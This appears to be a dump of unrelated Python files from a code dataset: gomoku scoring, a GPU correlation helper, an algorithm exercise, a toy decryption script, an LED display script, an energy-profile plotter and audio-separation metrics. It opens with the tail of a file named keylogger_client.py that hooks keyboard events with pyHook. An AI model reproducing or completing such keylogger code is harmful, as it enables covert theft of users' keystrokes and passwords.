pyHook.HookManager()\nkl.KeyDown = KeyStroke\n\n# 注册hook并执行\nkl.HookKeyboard()\npythoncom.PumpMessages()","sub_path":"keylogger/keylogger_client.py","file_name":"keylogger_client.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"381745166","text":"from __future__ import print_function\nfrom pprint import pprint\nimport random\nimport pipe as P\nimport numpy as np\nfrom pipe import DEBUG_EVAL, DEBUG\nimport sys\nfrom easyAI import TwoPlayersGame, Human_Player, AI_Player, Negamax\nfrom easyAI import id_solve, TT\nimport numpy as np\nfrom easyAI import SSS\nfrom numba import jit\nimport pdb \nimport cProfile \ntype_table = {\n (1,1,1,1,1): 'l_5',\n\n (1,1,1,1,0): 'l_4c',\n (1,1,1,0,1): 'l_4',\n (1,1,0,1,1): 'l_4',\n (1,0,1,1,1): 'l_4',\n (0,1,1,1,1): 'l_4c',\n\n (0,0,1,1,1): 'l_3c',\n (0,1,0,1,1): 'l_3',\n (0,1,1,0,1): 'l_3',\n (0,1,1,1,0): 'l_3c',\n # (1,0,0,1,1): 'l_3',\n (1,0,1,0,1): 'l_3',\n (1,0,1,1,0): 'l_3',\n # (1,1,0,0,1): 'l_3',\n (1,1,0,1,0): 'l_3',\n (1,1,1,0,0): 'l_3c',\n\n (1,1,0,0,0): 'l_2c',\n (1,0,1,0,0): 'l_2',\n # (1,0,0,1,0): 'l_2',\n # (1,0,0,0,1): 'l_2',\n (0,1,1,0,0): 'l_2c',\n (0,1,0,1,0): 'l_2',\n # (0,1,0,0,1): 'l_2',\n (0,0,1,1,0): 
'l_2c',\n (0,0,1,0,1): 'l_2',\n (0,0,0,1,1): 'l_2c',\n\n# ENEMY\n (2,2,2,2,2): 'b_5',\n\n (2,2,2,2,0): 'b_4c',\n (2,2,2,0,2): 'b_4',\n (2,2,0,2,2): 'b_4',\n (2,0,2,2,2): 'b_4',\n (0,2,2,2,2): 'b_4c',\n\n (0,0,2,2,2): 'b_3c',\n (0,2,0,2,2): 'b_3',\n (0,2,2,0,2): 'b_3',\n (0,2,2,2,0): 'b_3c',\n # (2,0,0,2,2): 'b_3',\n (2,0,2,0,2): 'b_3',\n (2,0,2,2,0): 'b_3',\n # (2,2,0,0,2): 'b_3',\n (2,2,0,2,0): 'b_3',\n (2,2,2,0,0): 'b_3c',\n\n (2,2,0,0,0): 'b_2c',\n (2,0,2,0,0): 'b_2',\n # (2,0,0,2,0): 'b_2',\n # (2,0,0,0,2): 'b_2',\n (0,2,2,0,0): 'b_2c',\n (0,2,0,2,0): 'b_2',\n # (0,2,0,0,2): 'b_2',\n (0,0,2,2,0): 'b_2c',\n (0,0,2,0,2): 'b_2',\n (0,0,0,2,2): 'b_2c'\n }\n\nscore_table = {\n 'b_5':-100000000,\n 'b_4c': -500,\n 'b_4': -500,\n 'b_3c': -100,\n 'b_3': -100,\n 'b_2c': -10,\n 'b_2': -1,\n\n 'l_5': 400000000,\n 'l_4c': 2000,\n 'l_4': 2000,\n 'l_3c': 400,\n 'l_3': 400,\n 'l_2c': 40,\n 'l_2': 4,\n\n 'z': 0\n }\n\ndef do_cprofile(func):\n def profiled_func(*args, **kwargs):\n profile = cProfile.Profile()\n try:\n profile.enable()\n result = func(*args, **kwargs)\n profile.disable()\n return result\n finally:\n profile.print_stats()\n return profiled_func\n\ndef score(board,witdh,nplayer):\n\n pat_l = []\n boardrot = np.rot90(board)\n psize = 5\n ret = 0\n\n for x in xrange(0, witdh):\n for y in xrange(0, witdh - psize + 1):\n a = tuple(board[x:x + 1, y:y + psize].flatten())\n b = tuple(board[y:y + psize, x:x + 1].flatten())\n\n if a in type_table:\n # pat_l.append(type_table[a]) \n ret += score_table[type_table[a]]\n if b in type_table:\n # pat_l.append(type_table[b]) \n ret += score_table[type_table[b]]\n\n for x in xrange(-witdh, witdh):\n for y in xrange(0, witdh - psize + 1):\n a = tuple(board.diagonal(x)[y:y+psize])\n b = tuple(boardrot.diagonal(x)[y:y+psize])\n if a in type_table:\n ret += score_table[type_table[a]]\n # pat_l.append(type_table[a]) \n if b in type_table:\n ret += score_table[type_table[b]]\n # pat_l.append(type_table[b]) \n if nplayer == 1:\n return ret\n else:\n return -ret\n\ndef computescore(board,width,nplayer,xmov,ymov): # pro dane souradnice xmov,ymov spocitam skore sloupce,radku a diagonal\n board = board\n newPatt = []\n boardrot = np.rot90(board)\n psize = 5\n ret = 0\n\n\n c = tuple(board.diagonal(-xmov+ymov))\n d = tuple(boardrot.diagonal(-width+1+ymov+xmov))\n a = tuple(board[xmov:xmov + 1].flatten())\n b = tuple(boardrot[-ymov-1].flatten())\n \n for x in xrange(0,len(a)-psize+1):\n aa = tuple(a[x:x+psize])\n if aa in type_table:\n newPatt.append(type_table[aa]) \n ret += score_table[type_table[aa]]\n\n for x in xrange(0,len(b)-psize+1):\n bb = tuple(b[x:x+psize])\n if bb in type_table:\n newPatt.append(type_table[bb]) \n ret += score_table[type_table[bb]]\n\n for x in xrange(0,len(c)-psize+1):\n cc = tuple(c[x:x+psize])\n if cc in type_table:\n newPatt.append(type_table[cc]) \n ret += score_table[type_table[cc]]\n\n for x in xrange(0,len(d)-psize+1):\n dd = tuple(d[x:x+psize])\n if dd in type_table:\n newPatt.append(type_table[dd]) \n ret += score_table[type_table[dd]]\n\n\n return ret\n\n","sub_path":"vlastni/flask/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"240057403","text":"import cupy as cp\r\nimport pandas as pd\r\nimport cudf\r\nimport dask_cudf\r\n\r\ndef good_neigbour(df):\r\n \"\"\"\r\n Computation of a big correlation matrix. Should be done on a GPU. We could not test this, as there is no gpu support\r\n on power. 
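Aside on the score.py tables above: scoring works by exact tuple lookup of every 5-cell window against type_table/score_table. A tiny self-contained check of the windowing idea, using a reduced demo table (the names here are illustrative, not the original tables):

DEMO_TABLE = {(1, 1, 1, 1, 1): 100, (0, 1, 1, 1, 0): 40}

def score_row(row, table=DEMO_TABLE, k=5):
    # Slide a length-k window over one row; unmatched windows score 0.
    return sum(table.get(tuple(row[i:i + k]), 0) for i in range(len(row) - k + 1))

print(score_row([0, 1, 1, 1, 0, 0, 0]))  # 40: one open three, nothing else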
We expect that dask_cudf works on x86.\r\n    :param df:\r\n    :return:\r\n    \"\"\"\r\n    cuda = cudf.DataFrame(df)\r\n    df = dask_cudf.from_cudf(cuda, npartitions=2)\r\n\r\n    df = df.groupby(['account', 'date'])['volume'].sum()\r\n\r\n    unique_market_parties = df.index.get_level_values('account').unique()\r\n    timepoints = df.index.get_level_values('date').unique()\r\n    index = pd.MultiIndex.from_product([unique_market_parties, timepoints], names=['account', 'date'])\r\n    cross_account_owners_timepoints = pd.DataFrame(index=index)\r\n    cross_account_owners_timepoints = cross_account_owners_timepoints.sort_values(['account', 'date'])\r\n\r\n    df = pd.merge(df, cross_account_owners_timepoints, on=['account', 'date'], how=\"outer\")\r\n    df['volume'] = df['volume'].fillna(0)\r\n    df = df['volume']\r\n\r\n    cor = df.unstack(level='account').corr()\r\n\r\n    cor.index = cor.index.rename('center')\r\n    cor.columns = cor.columns.rename('Peripherie')\r\n    cor = cor.stack()\r\n    cor.name = 'correlation'\r\n    cor = cor.to_frame()\r\n\r\n    buddy = cor.groupby('center')['correlation'].nsmallest(1)\r\n\r\n    return buddy","sub_path":"assets/jupyterlab/special_score/gpu_calculation.py","file_name":"gpu_calculation.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"381509511","text":"T = int(input())\r\n\r\nfor _ in range(T):\r\n    N = int(input())\r\n    result = N\r\n    score = []\r\n    for _ in range(N):\r\n        score.append(list(map(int, input().split())))\r\n    score.sort(key=lambda x: x[0])\r\n    minScore = score[0][1]\r\n    for i in score:\r\n        if i[1] > minScore:\r\n            result -= 1\r\n        else:\r\n            minScore = i[1]\r\n\r\n    print(result)","sub_path":"SOPTAC/3주차(그리디)/신입 사원 #1946.py","file_name":"신입 사원 #1946.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"63694801","text":"#!/usr/bin/python3\n###### this is the second .py file ###########\n\n####### write your code here ##########\n#function definition to rotate a string d elements to the right\ndef rotate_right(array,d):\n    r1=array[0:len(array)-d] # taking first n-d letters\n    r2=array[len(array)-d:] # last d letters\n    rotate = r2+r1 # reversed the order\n    return rotate #return statement\n\n\n\ndecrypted=\"\" # decrypted string will be stored here\n#k1=int(input(\"Enter the amount by which key1 elements are to be rotated\\n Decryption key1 = : \"))\n#k2=int(input(\"\\nDecryption key2 = : \"))\n#k3=int(input(\"\\nDecryption key3 = : \"))\nprint(\"Enter Key\")\nj1,j2,j3 =input().split(\" \")\nk1=int(j1)\nk2=int(j2)\nk3=int(j3)\nquer_str = input(\"Enter Encrypted string\\n\")\nprint(quer_str)\nalphabets=\"abcdefghijklmnopqrstuvwxyz_\"\nalphabets1=alphabets[0:9]\nalphabets2=alphabets[9:18]\nalphabets3=alphabets[18:27]\n# Declaring Strings to store different key characters\nkey1=\"\"\nkey2=\"\"\nkey3=\"\"\n# Separating keys for different ranges\nfor i in quer_str :\n    for j in alphabets1:\n        if i==j :\n            key1 = key1 + str(i)\n\n    for k in alphabets2:\n        if i==k :\n            key2 = key2 + str(i)\n\n    for l in alphabets3:\n        if i==l:\n            key3 = key3 + str(i)\n\n# keys sorted according to input numbers by which they are to be shifted\nnew_k1=rotate_right(key1,k1)\nnew_k2=rotate_right(key2,k2)\nnew_k3=rotate_right(key3,k3)\nindex1=0\nindex2=0\nindex3=0\n# Decrypting a string and printing original decrypted string\nfor i in quer_str:\n    for j in new_k1 :\n        if i==j:\n            decrypted=decrypted+new_k1[index1]\n            index1 = index1+1\n\n    for k in new_k2 :\n 
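Aside on the BOJ 1946 greedy above: after sorting by first-round rank, an applicant is hired exactly when their second-round rank beats the best second-round rank seen so far. A function-form restatement with a quick check (count_hired is a hypothetical name):

def count_hired(scores):
    # scores: (first_round_rank, second_round_rank) pairs, ranks unique
    hired, best_second = 0, float('inf')
    for _, second in sorted(scores):
        if second < best_second:   # beats everyone ranked above them
            hired += 1
            best_second = second
    return hired

assert count_hired([(1, 4), (2, 3), (3, 2), (4, 1), (5, 5)]) == 4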
if i==k :\n decrypted=decrypted+new_k2[index2]\n index2=index2+1\n\n for l in new_k3 :\n if i==l :\n decrypted=decrypted+new_k3[index3]\n index3=index3+1\n\nprint(\"Decrypted string is : \",decrypted)\n","sub_path":"ps2.py","file_name":"ps2.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76112694","text":"#!/usr/bin/env python\nfrom samplebase import SampleBase\nfrom rgbmatrix import graphics\nimport time\nimport random\n\n\nclass FixedText(SampleBase):\n def __init__(self, *args, **kwargs):\n super(FixedText, self).__init__(*args, **kwargs)\n self.parser.add_argument(\"-t\", \"--text\", help=\"The text to display. Format <line 1>::<line 2>\", default=\"Line 1: Line 2\")\n\n def run(self):\n canvas = self.matrix\n font = graphics.Font()\n font.LoadFont(\"animation/fonts/5x7.bdf\")\n\n line1_color = []\n line2_color = []\n for i in range(3):\n line1_color.append(random.randint(0, 255))\n line2_color.append(random.randint(0, 255))\n\n l1_color = graphics.Color(*tuple(line1_color))\n l2_color = graphics.Color(*tuple(line2_color))\n line1, line2 = self.args.text.strip().split('::')\n graphics.DrawText(canvas, font, 0, 7, l1_color, line1)\n graphics.DrawText(canvas, font, 0, 14, l2_color, line2)\n\n while True:\n time.sleep(2) \n\n\n# Main function\nif __name__ == \"__main__\":\n fixed_text = FixedText()\n if (not fixed_text.process()):\n fixed_text.print_help()\n","sub_path":"pubsub/animation/fixed-text.py","file_name":"fixed-text.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"623703652","text":"# -*- coding: utf-8 -*-\n\nfrom actor import teen_backend_list, army_backend_list, teen_activity_list, army_activity_list, status, logger\nfrom actor.__version__ import __logo__\nfrom actor.browser import login, get_pending_activities, show_pending, start_browser, \\\n login_backends, open_activities, get_all_activity_try_urls, get_army_activity_try_urls, add_date_filters\nfrom actor.cli import cli\nfrom actor.utils import sort_urls_by_activities\n\ndriver = None\n\n\ndef main():\n global driver # use global driver to avoid selenium closing browser\n print(__logo__)\n login()\n\n teen_urls = get_all_activity_try_urls(teen_backend_list, teen_activity_list, status=status)\n army_urls = get_army_activity_try_urls(army_backend_list, army_activity_list, status=status)\n urls = sort_urls_by_activities(army_urls + teen_urls)\n urls = add_date_filters(urls)\n pending = get_pending_activities(urls)\n show_pending(pending)\n\n driver = start_browser()\n login_backends(driver, {activity['backend'] for activity in pending})\n # login_examine(driver)\n open_activities(driver, pending)\n\n\nif __name__ == \"__main__\":\n try:\n # main()\n cli()\n except Exception as e:\n logger.exception(e)\n raise\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"363229470","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xlrd\nimport sys\nimport re\nfrom adjustText import adjust_text\n\n\ndef curve_points(y_small, y_large, direction):\n \"\"\"产生余弦曲线插点\"\"\"\n if direction == \"up\":\n # 上升余弦曲线,产生纵轴y的插值点\n x_up = np.linspace(np.pi, 2 * np.pi, 50)\n y_curve = [y_small + (y_large - y_small) * (j + 1) / 2 for j in np.cos(x_up).tolist()]\n else:\n # 
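Aside on rotate_right in ps2.py above: it moves the last d characters of a string to the front, so a left rotation by the same d must restore the original string, which gives a cheap round-trip test (rotate_left is a hypothetical helper added only for the check):

def rotate_right(s, d):
    return s[len(s) - d:] + s[:len(s) - d]

def rotate_left(s, d):
    return s[d:] + s[:d]

s = 'abcdefg'
for d in range(len(s) + 1):
    assert rotate_left(rotate_right(s, d), d) == s
print('round-trip ok')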
下降余弦曲线,产生纵轴y的插值点\n x_down = np.linspace(0, np.pi, 50) # 下降余弦曲线横坐标\n y_curve = [y_small + (y_large - y_small) * (j + 1) / 2 for j in np.cos(x_down).tolist()]\n return y_curve\n\n\ndef interpolate_cos(x, y):\n \"\"\"在反应路径驻点上产生一系列余弦曲线插值点\"\"\"\n x_new = []\n y_smooth = []\n\n # 1. 延伸起始点\n x_pre_temp = np.linspace(x[0] - 1, x[0], 50).tolist()\n # 下降余弦曲线,产生纵轴y的插值点,与初始两个点间曲线对称\n y_pre_temp = curve_points(y[0], y[1], \"down\")\n x_new = x_new + x_pre_temp\n y_smooth = y_smooth + y_pre_temp\n\n # 2. 中间点插值\n for i in range(len(x) - 1):\n x_new_temp = np.linspace(x[i], x[i + 1], 50).tolist() # 产生横轴x的插值点\n if y[i] < y[i + 1]:\n y_smooth_temp = curve_points(y[i], y[i+1], \"up\") # 上升余弦曲线,产生纵轴y的插值点\n else:\n y_smooth_temp = curve_points(y[i+1], y[i], \"down\") # 下降余弦曲线,产生纵轴y的插值点\n x_new = x_new + x_new_temp # 包含所有横坐标点的列表\n y_smooth = y_smooth + y_smooth_temp # 包含所有纵坐标点的列表\n\n # 3. 延伸末端点\n x_post_temp = np.linspace(x[-1], x[-1] + 1, 50).tolist()\n # 上升余弦曲线,产生纵轴y的插值点,与最后两个点间曲线对称\n y_post_temp = curve_points(y[-1], y[-2], \"up\")\n x_new = x_new + x_post_temp\n y_smooth = y_smooth + y_post_temp\n\n return x_new, y_smooth # 返回所有插值点的坐标\n\n\ndef plot_curve(x, y, color, path_label, TextLabel, FontSize=22):\n \"\"\"绘制多条平滑曲线型能垒图\"\"\"\n x_new_array = []\n y_smooth_array = []\n for i in range(len(y)): # 遍历所有列的能量值\n x_strip = []\n y_strip = []\n for j in range(len(y[i])):\n if y[i][j] != \"\": # 剔除空数据\n y_strip.append(y[i][j])\n x_strip.append(x[j])\n\n plt.scatter(x_strip, y_strip, linewidth=6, color=color[i]) # 绘制散点图\n x_new, y_smooth = interpolate_cos(x_strip, y_strip) # 调用插点函数,生成插点坐标\n plt.plot(x_new, y_smooth, linewidth=4, label=path_label[i], color=color[i]) # 绘制平滑曲线\n x_new_array = np.append(x_new_array, x_new)\n y_smooth_array = np.append(y_smooth_array, y_smooth)\n\n # 标记能量值,偏移量视具体情况而定\n if TextLabel == 'True':\n for j in range(len(x_strip)):\n texts = [plt.text(x_strip[j], y_strip[j], \"{:.1f}\".format(y_strip[j]), fontsize=FontSize,\n color=color[i])] # 标记能量值,偏移量视具体情况而定\n adjust_text(texts, x_new_array, y_smooth_array) # 调用adjust_text,尽可能避免文字文字、文字与曲线重叠\n\n\ndef line_split(x, y, color, TextLabel, FontSize=22):\n \"\"\"绘制单条分段实线图\"\"\"\n y_new = []\n x_new = []\n # 1.生成新的XY坐标点,个数加倍\n for i in range(len(y)):\n if y[i] != \"\": # 剔除空数据\n y_new.append(y[i])\n y_new.append(y[i])\n x_new.append(2*i+1)\n x_new.append(2*i+2)\n # 2.绘制实线折线图\n i = 0\n while i < len(y_new):\n x_line = [x_new[i], x_new[i+1]]\n y_line = [y_new[i], y_new[i+1]]\n plt.plot(x_line, y_line, linestyle='-', linewidth=6, color=color)\n i += 2\n # 3.添加能量值文本标签\n if TextLabel == 'True':\n for j in range(len(x)):\n if y[j] != \"\":\n plt.text(x[j] * 2 - 0.9, y[j] + 0.4, \"{:.1f}\".format(y[j]), fontsize=FontSize, color=color)\n return x_new, y_new\n\n\ndef plot_line_dot(x, y, color, path_label, TextLabel, FontSize=22):\n \"\"\"绘制多条虚实折线图\"\"\"\n y_max, y_min = y_extreme(y) # 获取y值的最大值和最小值\n y_bias = (y_max - y_min) / 50 # 获取文本标签y方向偏移量\n if isinstance(path_label, list): # 多条路径的情况\n for i in range(len(y)): # 遍历所有列的能量值\n # 绘制分段实线折线图\n x_new, y_new = line_split(x[i], y[i], color[i], TextLabel=\"False\")\n # 绘制虚线折线图\n plt.plot(x_new, y_new, linestyle='--', linewidth=5, color=color[i], label=path_label[i])\n # 标记能量值,偏移量视具体情况而定\n if TextLabel == 'True':\n for j in range(len(x)):\n if y[i][j] != \"\":\n plt.text(x[j] * 2 - 0.9, y[i][j] + y_bias, \"{:.1f}\".format(y[i][j]), fontsize=FontSize,\n color=color[i])\n else: # 单条路径的情况\n # 绘制分段实线折线图\n x_new, y_new = line_split(x, y, color, TextLabel=\"False\")\n # 绘制虚线折线图\n plt.plot(x_new, y_new, linestyle='--', 
linewidth=5, color=color, label=path_label)\n\n # 标记能量值,偏移量视具体情况而定\n if TextLabel == 'True':\n for j in range(len(x)):\n if y[j] != \"\":\n plt.text(x[j] * 2 - 0.9, y[j] + y_bias, \"{:.1f}\".format(y[j]), fontsize=FontSize, color=color)\n\n\ndef plot_line_curve(y_ini, _xtick_labels, color, PathLabel, TextLabel, FontSize=22):\n \"\"\"单条曲线:根据中间体及过渡态类型绘制能垒图,对中间体绘制横线,对过渡态绘制曲线\"\"\"\n # 1. 数据预处理\n x_ini = [i * 2 + 2 for i in range(len(y_ini))] # 产生x轴坐标\n x = []\n y = []\n for i in range(len(y_ini)):\n if y_ini[i] != \"\":\n if re.match(r\"^TS\", _xtick_labels[i]) is not None: # 判断是否为TS数据点,若是,将y值添加到新的列表中\n y.append(y_ini[i])\n x.append(x_ini[i])\n else: # 若否,将y值分两次添加到新的列表中\n y.append(y_ini[i])\n y.append(y_ini[i])\n x.append(x_ini[i]-0.5)\n x.append(x_ini[i]+0.5)\n\n # 2. 产生插值点\n x_new = []\n y_smooth = []\n for i in range(len(x) - 1):\n # 产生横轴x的插值点\n x_new_temp = np.linspace(x[i], x[i + 1], 50).tolist()\n if y[i] < y[i + 1]:\n # 上升余弦曲线,产生纵轴y的插值点\n y_smooth_temp = curve_points(y[i], y[i+1], \"up\")\n elif y[i] > y[i + 1]:\n # 下降余弦曲线,产生纵轴y的插值点\n y_smooth_temp = curve_points(y[i+1], y[i], \"down\")\n else:\n # 长横线\n y_smooth_temp = np.linspace(y[i], y[i+1], 50).tolist()\n x_new = x_new + x_new_temp # 包含所有横坐标点的列表\n y_smooth = y_smooth + y_smooth_temp # 包含所有纵坐标点的列表\n\n # 3. 绘制曲线\n plt.plot(x_new, y_smooth, linewidth=6, color=color, label=PathLabel) # 绘制曲线\n\n # 4. 添加能量值文本标签\n if TextLabel == 'True':\n # 添加能量值文本标签\n for i in range(len(y_ini)):\n # 标记能量值,偏移量视具体情况而定\n if y_ini[i] != \"\":\n texts = [plt.text(x_ini[i] - 0.2, y_ini[i] + 0.06, \"{:.1f}\".format(y_ini[i]), fontsize=FontSize, color=color)]\n adjust_text(texts, x_new, y_smooth) # 调用adjust_text,尽可能避免文字文字、文字与曲线重叠\n\n return x_ini # 返回x标签点,用于绘制x轴标签\n\n\ndef plot_scatter(x_sticks, y, color, path_label, TextLabel, FontSize=22):\n \"\"\"作散点图,并以长横线显示数据点\"\"\"\n for i in range(len(y)): # 遍历所有列的能量值\n y_strip = []\n x_strip = []\n for j in range(len(y[i])):\n if y[i][j] != \"\": # 剔除空数据\n x_strip.append(x_sticks[j])\n y_strip.append(y[i][j])\n # 添加文本标签\n if TextLabel == \"True\":\n plt.text(x_sticks[j] - 0.3, y[i][j] + 0.06, \"{:.1f}\".format(y[i][j]), fontsize=FontSize, color=color[i])\n # 绘制其他自旋态,画横线\n plt.scatter(x_strip, y_strip, linewidth=6, color=color[i], label=path_label[i], marker='_', s=1200)\n\n\ndef y_extreme(y):\n \"\"\"返回y列表中的最大值和最小值\"\"\"\n nest = \"False\"\n for i in y:\n if isinstance(i, list):\n nest = \"True\" # 若是嵌套列表,给nest赋值为True\n break\n if nest == \"True\":\n temp = sum(y, []) # 展开y列表\n else:\n temp = y\n temp = [i for i in temp if i != \"\"] # 剔除空数据\n y_max, y_min = max(temp), min(temp)\n return y_max, y_min\n\n\ndef y_list_min(y):\n \"\"\"寻找每行的最小值,并返回一个最小值的列表\"\"\"\n y_T = np.array(y).T.tolist() # 转置y列表数据\n y_min = []\n for i in range(len(y_T)):\n for j in range(y_T[i].count(\"\")):\n y_T[i].remove(\"\") # 删除空数据\n y_min.append(min(list(map(float, y_T[i])))) # 返回每行的最小值,添加到y_min_list列表中\n return y_min\n\n\n# 1. 
导入数据\nExcelFile = xlrd.open_workbook(sys.argv[1]) # 读取Excel数据\nsheet = ExcelFile.sheet_by_index(0) # 读取Excel的第一个sheet\n_xtick_labels = sheet.col_values(0)[5:] # 读取第一列数据,反应路径驻点的名称\npic_title = sheet.row_values(0)[1] # 读取图片标题\nX_title = sheet.row_values(1)[1] # 读取X轴标题\nY_title = sheet.row_values(2)[1] # 读取Y轴标题\npath_label = sheet.row_values(3)[1:] # 读取第一行数据,不同反应路径的名称\ncolor = sheet.row_values(4)[1:]\nx = [i+1 for i in range(len(_xtick_labels))] # 生成横坐标\ny = []\nfor i in range(len(sheet.row_values(0))-1):\n y.append(sheet.col_values(i+1)[5:]) # 读取除第一列外的所有列数据,即纵坐标能量值\n\ny_min_list = y_list_min(y) # 返回所有中间体及过渡态中最稳定自旋态的能量值\n\n# 2. 绘制图像\nplt.figure(figsize=(15, 9), dpi=80) # 设置图片大小及分辨率\n\nplot_style = int(sys.argv[2])\nTextLabel = str(sys.argv[3]) # 是否添加坐标点对应的数值文本标签\nFontSize = 22 # 设置能量值文本大小,默认值为22,可根据需要修改\nAxis_FontSize = 20 # 设置XY轴标签及标题大小,默认值为20,可根据需要修改\nif plot_style == 1: # 绘制平滑曲线\n plot_curve(x, y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] - 0.5, x[-1] + 0.5) # x轴刻度范围\n plt.xticks(x, _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 11:\n x_new, y_smooth = interpolate_cos([i * 2 - 0.5 for i in x], y_min_list) # 调用插点函数,生成插点坐标\n plt.plot(x_new, y_smooth, color=\"grey\", label=None, linewidth=6) # 绘制平滑曲线\n plot_scatter([i * 2 - 0.5 for i in x], y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] * 2 - 1.5, x[-1] * 2 + 1) # x轴刻度范围\n plt.xticks([i * 2 - 0.5 for i in x], _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 2: # 绘制虚实折线\n plot_line_dot(x, y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] * 2 - 1.5, x[-1] * 2 + 1) # x轴刻度范围\n plt.xticks([i * 2 - 0.5 for i in x], _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 22: # # 对不同自旋态,只给最稳定态绘制虚实折线\n plot_line_dot(x, y_min_list, \"grey\", None, TextLabel=\"False\") #\n for i in range(len(y)):\n line_split(x, y[i], color[i], TextLabel=\"False\")\n plot_scatter([i * 2 - 0.5 for i in x], y, color, path_label, TextLabel, FontSize)\n plt.xlim(x[0] * 2 - 1.5, x[-1] * 2 + 1) # x轴刻度范围\n plt.xticks([i * 2 - 0.5 for i in x], _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelif plot_style == 3: # 绘制横线&平滑曲线\n for i in range(len(y)): # 遍历所有列的能量值\n x_sticks = plot_line_curve(y[i], _xtick_labels, color[i], path_label[i], TextLabel, FontSize)\n plt.xticks(x_sticks, _xtick_labels, fontsize=Axis_FontSize) # x轴标签\nelse: # 33 对不同自旋态,只能最稳定态绘制横线&平滑线,其他点绘制横线\n x_sticks = plot_line_curve(y_min_list, _xtick_labels, \"grey\", None, TextLabel=\"False\") # 绘制平滑线\n plt.xticks(x_sticks, _xtick_labels, fontsize=Axis_FontSize) # x轴标签\n plot_scatter(x_sticks, y, color, path_label, TextLabel, FontSize)\n\n# 若x轴标签过长产生重叠,可设置旋转角度,比如rotation=-90, HorizontalAlignment=\"right\"\n\n# 3. 
图片设置\ny_max, y_min = y_extreme(y) # 获取y值的最大值和最小值\ny_scale = (y_max - y_min) / 10 # y轴延伸长度\nplt.ylim(y_min - y_scale, y_max + y_scale) # y轴刻度范围\nplt.yticks(fontsize=Axis_FontSize) # y轴标签\n# plt.xlabel(X_title, fontsize=Axis_FontSize) # 横轴标题\nplt.ylabel(Y_title, fontsize=Axis_FontSize) # 纵轴标题\n# plt.title(pic_title, fontsize=Axis_FontSize) # 图标题\n\nplt.legend(fontsize=Axis_FontSize-2, loc=\"upper right\") # 添加图例,位置在左上角\nplt.tight_layout() # 图像外部边缘的调整\n\n# plt.show() # 展示图片\nplt.savefig(\"./EnergyProfile.png\") # 保存图片到当前目录\n","sub_path":"2019/08/09/matplotlib绘制势能面剖面图/Plot_EnergyProfile.py","file_name":"Plot_EnergyProfile.py","file_ext":"py","file_size_in_byte":13696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"388650384","text":"class Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n carry = 1\n for idx, num in enumerate(reversed(digits)):\n sum = num + carry\n carry, digits[~idx] = sum / 10, sum % 10\n return [carry] + digits if carry else digits\n","sub_path":"Plus One.py","file_name":"Plus One.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"97393911","text":"from numpy import *\r\nimport os\r\nimport librosa\r\nimport matplotlib.pyplot as plt\r\n\r\ndef eval_sisnr(s_hat,s):\r\n\tif s_hat.shape[0]==s.shape[0]:\r\n\t\teps = finfo(float32).eps;\r\n\t\ts_target=(dot(s_hat,s)/dot(s,s))*s\r\n\t\ts_error=s_hat-s_target\r\n\t\tsisnr=10*log10(max(dot(s_target,s_target),eps)/max(dot(s_error,s_error),eps))\r\n\t\treturn sisnr\r\n\telse:\r\n\t\tprint('They need to have same dimension')\r\n\t\treturn None\r\n\r\ndef evaluation(s1,s2,mixture,folder):\r\n\t# s1,s2 is numpy.ndarray mixture is Mixture()\r\n\r\n\tif os.path.exists(folder+'male_estimated.wav'):\r\n\t\tos.remove ( folder+'male_estimated.wav')\r\n\tif os.path.exists (folder+'female_estimated.wav' ):\r\n\t\tos.remove ( folder+'female_estimated.wav' )\r\n\tif os.path.exists(folder+'mix.wav'):\r\n\t\tos.remove ( folder+'mix.wav' )\r\n\tif os.path.exists(folder+'male_origin.wav'):\r\n\t\tos.remove ( folder+'male_origin.wav' )\r\n\tif os.path.exists ( folder+'female_origin.wav' ):\r\n\t\tos.remove ( folder+'female_origin.wav' )\r\n\tmale_sisdr=eval_sisnr ( s1, mixture.wav1 )\r\n\tfemale_sisdr=eval_sisnr( s2, mixture.wav2 )\r\n\tmale_o_sisdr=eval_sisnr(mixture.wav1+mixture.wav2,mixture.wav1)\r\n\tfemale_o_sisdr=eval_sisnr ( mixture.wav1 + mixture.wav2,mixture.wav2 )\r\n\t\r\n\twith open(folder+'evaluation_results.txt','w') as f:\r\n\t\tseq=['male_sisdr:'+str(male_sisdr)+'\\n','sisdr between mixture and male sound:'+str(male_o_sisdr)+'\\n',\r\n\t\t 'female_sisdr:'+str(female_sisdr)+'\\n','sisdr between mixture and female sound:'+str(female_o_sisdr)+'\\n']\r\n\t\tf.writelines(seq)\r\n\t\r\n\tlibrosa.output.write_wav(folder+'mix.wav',mixture.wav1 + mixture.wav2,16000)\r\n\tlibrosa.output.write_wav ( folder + 'male_origin.wav', mixture.wav1, 16000 )\r\n\tlibrosa.output.write_wav ( folder + 'female_origin.wav', 